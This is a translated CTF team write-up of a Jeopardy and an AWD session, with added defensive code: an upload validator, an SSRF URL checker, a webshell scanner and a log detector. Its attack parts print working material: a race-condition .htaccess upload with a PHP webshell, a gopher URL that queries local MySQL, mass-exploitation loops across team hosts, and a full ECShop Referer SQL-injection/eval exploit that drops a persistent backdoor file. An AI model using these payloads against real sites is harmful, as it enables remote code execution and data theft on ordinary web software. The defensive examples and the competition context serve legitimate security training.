Congratulations to our team, bleem, on an excellent result in this competition. Keep it up!

Jeopardy
The morning Jeopardy session had two web challenges.
web1:
The challenge is an image upload. After changing the file type to PHP in Burp and uploading, you get the hint '比比誰速度快' ("let's see who is faster"). Trying to upload a .htaccess file, you can guess the idea: keep uploading .htaccess through the race condition, then upload an image webshell, and you get a shell.
Script for uploading .htaccess:
```python
import requests
import time

# Keep re-uploading .htaccess so that, inside the race window before the
# server removes it, a subsequently uploaded .jpg is handled as PHP.
while True:
    files = {'file': ('.htaccess', open('.htaccess', 'rb'), 'image/jpeg')}
    r = requests.post('http://127.0.0.1/upload', files=files)
    time.sleep(0.5)
```
Contents of .htaccess:
```apache
<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
```
Then upload a JPG containing a one-line webshell and you're done.
shell.jpg:
```php
<?php system('cat /flag.txt');?>
```
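The race above only works because the server writes the uploaded file into the web root before deciding whether it is acceptable, and because Apache honours a .htaccess dropped there. The upload validator below is an added example (not code from the original post or from the challenge) of how a handler can close both gaps: it rejects dotfiles outright, requires the extension, the declared Content-Type and the file's magic bytes to agree, refuses image bodies that carry a PHP open tag, and stores the file under a server-chosen name in an assumed directory (/srv/uploads) outside the document root. Pairing this with AllowOverride None in the Apache vhost means a stray .htaccess is ignored even if one did land in the web root.

```python
import os
import secrets

# Constructed allowlist for this example (not from the original post):
# extension -> client-declared Content-Type values accepted for it, and the
# magic bytes the file body must start with. The Content-Type is attacker
# controlled and is only checked for consistency, never trusted on its own.
ALLOWED_TYPES = {
    "jpg": {"image/jpeg", "image/jpg"},
    "png": {"image/png"},
}
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
# Assumption: uploads are written here, outside the document root, so even a
# file that slipped through could never be executed by the PHP handler.
UPLOAD_DIR = "/srv/uploads"


def validate_upload(filename, content_type, data):
    """Return (accepted, detail). Every decision uses server-side evidence only."""
    base = os.path.basename(filename)
    if not base or base.startswith("."):
        # .htaccess, .user.ini and friends never count as images.
        return False, "dotfiles are rejected"
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not in the allowlist"
    if content_type not in ALLOWED_TYPES[ext]:
        return False, "declared Content-Type does not match the extension"
    if not data.startswith(MAGIC[ext]):
        return False, "body does not start with the magic bytes of that image type"
    if b"<?php" in data or b"<?=" in data:
        # Defence in depth: an image with an embedded PHP open tag is not an image.
        return False, "PHP open tag inside image body"
    return True, ext


def stored_name(ext):
    """The server picks the on-disk name; nothing from the client survives."""
    return f"{secrets.token_hex(16)}.{ext}"


def store_upload(filename, content_type, data, upload_dir=UPLOAD_DIR):
    """Validate first, then write under a server-chosen name. Returns the path or None."""
    ok, detail = validate_upload(filename, content_type, data)
    if not ok:
        return None
    path = os.path.join(upload_dir, stored_name(detail))
    with open(path, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    # Constructed inputs: the two uploads from the write-up and a harmless JPEG.
    print(validate_upload(".htaccess", "image/jpeg", b'<FilesMatch "jpg">'))
    print(validate_upload("shell.jpg", "image/jpeg", b"<?php system('id'); ?>"))
    print(validate_upload("cat.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF"))
```

Validation happens entirely before the first byte touches disk, so there is no window in which an unchecked file exists inside a served directory. The magic-byte and open-tag checks are layers, not the control: the control is that the stored file can never be handed to the PHP interpreter.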
web2:
In this challenge /etc/passwd can be read through the file protocol, but file:///flag.txt turns out not to exist and reading index.php is forbidden. Viewing the page source with F12 shows that the flag is stored in MySQL. The first idea was to read the flag through the gopher protocol. I could not get the payload built properly during the competition; whether or not this method is right, treat it as a learning exercise.
Connect to MySQL and run the query statement.

Capture the traffic with Wireshark, follow the TCP stream, and filter out the red (client-to-server) data.

Convert that data into a gopher URL:
```text
gopher://127.0.0.1:3306/_%26%00%00%01%85%a6%03%00%00%00%00%01%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%28%00%00%00%03%73%65%6c%65%63%74%20%69%6e%66%6f%20%66%72%6f%6d%20%64%76%77%61%2e%63%74%68%61%63%6b%20%77%68%65%72%65%20%69%64%3d%32
```
CRLF issue: when testing with curl, append %0d%0a at the end.
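What makes the web2 challenge exploitable is that the server fetches whatever URL it is given: file:// reaches the filesystem, gopher:// reaches the MySQL socket on 127.0.0.1:3306, and encoded CR/LF lets extra protocol lines be smuggled into that connection. The check below is an added example (not code from the original post) of the input validation that stops all three: an allowlist of schemes and ports, a CR/LF refusal, and a resolve-then-classify step that rejects loopback, private, link-local and otherwise non-public addresses. The resolver is injectable so the example runs offline; the names `check_fetch_url`, `is_public` and the two policy sets are this example's own.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed policy for this example (not from the original post): the server
# only fetches plain web URLs on the standard ports.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_host(host):
    """Default resolver; check_fetch_url accepts any callable so tests run offline."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public(addr):
    """True only for globally routable unicast addresses."""
    return not (addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def check_fetch_url(url, resolve=resolve_host):
    """Return (allowed, reason) for a user-supplied URL the server is asked to fetch."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # file://, gopher://, dict:// and similar are never fetched on a user's behalf.
        return False, f"scheme {scheme!r} is not allowed"
    if any(marker in url for marker in ("\r", "\n", "%0d", "%0D", "%0a", "%0A")):
        # Raw or encoded CR/LF would let the request smuggle extra protocol lines.
        return False, "CR/LF in URL"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port is not None and port not in ALLOWED_PORTS:
        return False, f"port {port} is not allowed"
    try:
        addrs = {ipaddress.ip_address(host)}          # literal IPv4/IPv6 address
    except ValueError:
        try:
            addrs = {ipaddress.ip_address(a) for a in resolve(host)}
        except (socket.gaierror, ValueError, OSError):
            return False, f"{host} does not resolve"
    if not addrs:
        return False, f"{host} does not resolve"
    for addr in addrs:
        if not is_public(addr):
            return False, f"{host} maps to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs mirroring the write-up's attempts plus a benign URL.
    stub = lambda host: {"93.184.216.34"}   # offline stand-in for DNS
    for candidate in ("file:///etc/passwd",
                      "gopher://127.0.0.1:3306/_%26%00%00%01",
                      "http://127.0.0.1/index.php",
                      "http://example.com/page"):
        print(candidate, "->", check_fetch_url(candidate, resolve=stub))
```

One caveat worth keeping in mind: a check that resolves the name and then lets an HTTP client resolve it again is open to DNS rebinding, so the fetch should connect to the address that passed `is_public`, not re-resolve the hostname. The gopher URL in the write-up is rejected at the very first step, before any parsing of its percent-encoded body.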

AWD mode
The afternoon AWD session also had only two web challenges.
web1:
For web1, ls -a in /var/www/html/ reveals a hidden file .shell.php. The word flag is filtered, which can be bypassed with cat /fla*.
Script:
```python
import requests

# Build the list of hosts 172.20.101.101 ... 172.20.112.101
ip1 = 'http://172.20.'
ip2 = '.101'
ip = []
for i in range(101, 113, 1):
    ip.append(ip1 + str(i) + ip2)

# The filter blocks the literal word "flag"; the shell glob /fla* sidesteps it.
data = {'cmd': 'system("cat /fla*");'}
for i in ip:
    try:
        r = requests.post(i + '/.shell.php', data=data, timeout=0.5)
        print(i)
        print(r.text)
    except requests.RequestException:
        pass
```
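Two defensive lessons sit in this web1 box. The first is that a deny-list on the command string (blocking the word "flag") is not a control at all, as the /fla* glob shows; the only fix is removing the backdoor and the eval behind it. The second is that the backdoor was a dotfile, which a casual ls misses. The scanner below is an added example (not code from the original post) of the first thing a team should run on its own box in AWD: it walks a web root, flags hidden PHP files, and flags files where request data ($_GET, $_POST and the like) appears alongside a code- or command-execution function. The sample web root is constructed inside a temporary directory so the example runs anywhere; the file names and contents in it are this example's own.

```python
import os
import re
import tempfile

PHP_EXT = (".php", ".phtml", ".php5", ".phar")
# Functions that turn a string into code or a command.
DANGEROUS = re.compile(
    rb"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I)
# Superglobals that carry request data.
USER_INPUT = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b", re.I)


def scan_webroot(root):
    """Return sorted (relative path, reasons) pairs for PHP files worth a look."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                body = fh.read()
            reasons = []
            if name.startswith("."):
                reasons.append("hidden PHP file")
            calls = {m.group(1).decode().lower() for m in DANGEROUS.finditer(body)}
            if calls and USER_INPUT.search(body):
                reasons.append("user input reaches " + ",".join(sorted(calls)))
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


def build_sample_webroot():
    """Constructed sample tree (not from any real system) for demonstration."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        ".shell.php": b"<?php eval($_POST['cmd']); ?>",        # hidden one-liner backdoor
        "index.php": b"<?php echo 'hello'; ?>",
        "admin/upload.php": b"<?php $f = $_FILES['f']; move_uploaded_file($f['tmp_name'], 'x'); ?>",
        "img/cat.jpg": b"\xff\xd8\xff",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reasons in scan_webroot(build_sample_webroot()):
        print(rel, "->", "; ".join(reasons))
```

On a real box, point `scan_webroot` at /var/www/html and diff the result against a clean copy of the service; anything hidden or anything that feeds request data into eval or system is a candidate to delete or patch before the next round.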
web2:
ECShop code execution vulnerability.
First send the curl command payloads (kept in the script's docstring), then run the script:
```python
import requests
import os

'''
curl "http://172.20.102.102/user.php" -d "action=login&okami=phpinfo();exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
curl "http://172.20.102.102/user.php" -d "action=login&okami=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbChbb2thbWldKTsnKQoOw));exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
'''

# Build the list of hosts 172.20.101.102 ... 172.20.112.102
ip1 = 'http://172.20.'
ip2 = '.102'
ip = []
for i in range(101, 113, 1):
    ip.append(ip1 + str(i) + ip2)

for i in ip:
    try:
        r = requests.post(i + '/okami.php?okami=system("cat /flag.txt");', timeout=0.5)
        print(i)
        print(r.text)
    except requests.RequestException:
        pass
```
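The curl commands above put the whole payload in the Referer header: a PHP serialized array (a:3:{s:3:"num"...), a union/* SQL fragment, and long hex literals. Those are all things a normal Referer never contains, which makes the attack easy to spot in a combined-format access log even though POST bodies are not logged. The detector below is an added example (not code from the original post) that splits each log line into its quoted request, referer and user-agent fields, undoes the \" escaping Apache and Nginx apply, and reports which indicators a Referer matches. The three log lines are constructed for this example; the hash value in the second one is the one that appears in the write-up's payload, and the hex blob is a placeholder.

```python
import re

# Combined log format: the quoted fields are request, referer, user-agent.
# Quotes inside a field are logged as \" so the field regex must skip escaped chars.
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')
INDICATORS = {
    "php_serialized_array": re.compile(r'a:\d+:\{s:\d+:"'),
    "sql_union_comment": re.compile(r"union\s*/\*", re.I),
    "php_eval": re.compile(r"eval\s*(?:/\*.*?\*/)?\s*\(", re.I),
    "base64_decode": re.compile(r"base64_decode", re.I),
    "long_hex_literal": re.compile(r"0x[0-9a-fA-F]{32,}"),
}

# Constructed sample log (not a real capture): one normal request, one request
# carrying the Referer payload pattern from the write-up, one with no referer.
SAMPLE_LOG = [
    '172.20.101.5 - - [10/Nov/2018:14:02:11 +0800] "GET /index.php HTTP/1.1" 200 5123 '
    '"http://shop.example/category.php?id=3" "Mozilla/5.0"',
    '172.20.101.9 - - [10/Nov/2018:14:03:40 +0800] "POST /user.php HTTP/1.1" 200 412 '
    '"45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:\\"num\\";s:207:\\"*/ select 1,'
    '0x2720756e696f6e2f2a,3,4,5,6,7,8,0x41414141414141414141414141414141414141414141,0--\\";'
    's:2:\\"id\\";s:9:\\"\' union/*\\";s:4:\\"name\\";s:3:\\"ads\\";}'
    '45ea207d7a2b68c49582d2d22adf953a" "curl/7.61.0"',
    '172.20.101.9 - - [10/Nov/2018:14:03:41 +0800] "POST /user.php HTTP/1.1" 200 88 "-" "curl/7.61.0"',
]


def split_fields(line):
    """Return (request, referer, user_agent) with log escaping undone, or None."""
    fields = [f.replace('\\"', '"') for f in QUOTED.findall(line)]
    if len(fields) < 3:
        return None
    return fields[0], fields[1], fields[2]


def classify_referer(referer):
    """Sorted names of the indicators present in a Referer value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(referer))


def scan_log(lines):
    """Return (line index, request line, indicators) for entries with a suspicious Referer."""
    hits = []
    for idx, line in enumerate(lines):
        fields = split_fields(line)
        if fields is None:
            continue
        request, referer, _user_agent = fields
        found = classify_referer(referer)
        if found:
            hits.append((idx, request, found))
    return hits


if __name__ == "__main__":
    for idx, request, found in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {request} <- Referer indicators: {', '.join(found)}")
```

Any single indicator is noisy on its own (hex literals show up in legitimate tracking URLs), so an alert rule should require at least two of them, and a match on /user.php with action=login in the request is the case to escalate first. For the AWD box itself the detection is a stopgap; the durable fix is to patch the vulnerable ECShop code so the Referer never reaches SQL or eval.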
Please credit the source when reposting. Original link: https://www.uj5u.com/qita/76219.html
